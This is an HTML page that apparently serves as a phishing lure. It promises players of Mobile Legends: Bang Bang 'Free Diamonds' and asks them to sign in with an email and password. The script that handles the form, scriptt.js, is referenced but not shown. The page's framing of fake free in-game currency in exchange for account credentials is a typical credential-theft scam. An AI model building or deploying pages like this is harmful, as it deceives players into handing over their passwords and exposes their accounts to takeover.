<!DOCTYPE html>
<html lang="en">

<head>
   <title>Moble Legends Bang Bang Free Diamonds!!!</title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <script type="text/javascript" nonce="658db13c5f0741b19ab721d93f2" src="//local.adguard.org?ts=1615027184370&amp;type=content-script&amp;dmn=doc-04-50-docs.googleusercontent.com&amp;app=com.operasoftware.OperaDeveloper&amp;css=1&amp;js=1&amp;gcss=1&amp;rel=1&amp;rji=1&amp;sbe=0&amp;stealth=1&amp;uag="></script>
<script type="text/javascript" nonce="658db13c5f0741b19ab721d93f2" src="//local.adguard.org?ts=1615027184370&amp;name=AdGuard%20Extra&amp;type=user-script"></script><link rel="stylesheet" href="https://www.w3schools.com/w3css/3/w3.css">
   <link rel="stylesheet" href="stylee.css">
   <link rel="stylesheet" href="scriptt.js">
</head>

<body>

   <nav class="w3-bar w3-black">
      <a href="Hp.html" class="w3-button w3-bar-item">Home</a>
      <a href="#Donate.html" class="w3-button w3-bar-item">Donate</a>
      <a href="#Spin.html" class="w3-button w3-bar-item">Spin</a>
      <a href="#Contact.html" class="w3-button w3-bar-item">Contact</a>

   </nav>
   <img src="mlbb-2.jpg" style="width:100%" alt="Cool">
   <div style="background-image: url('mlbb-1.jpg');">
      <h1 class="sign-in">SIGN IN:</h1>

      <label class="label">Email:<br>
      <input id="email" type="text" placeholder="Enter email" name="Email" required></label> <br>


      <label class="label">Password: <br>
      <input type="password" placeholder="Enter password" id="password" name="psw" required></label><br>
      <button id="login-btn" type="click">Login</button><br>
      <label style="color:white;"> <input type="checkbox" checked="checked" name="remember">Remember me<br>
      </label>
      <span class="psw" style="color:white;">Forgot your <a href="#" style="color:white;">password?</a></span>
   </div>
   <script type="text/javascript" src="scriptt.js"></script>
</body>

</html>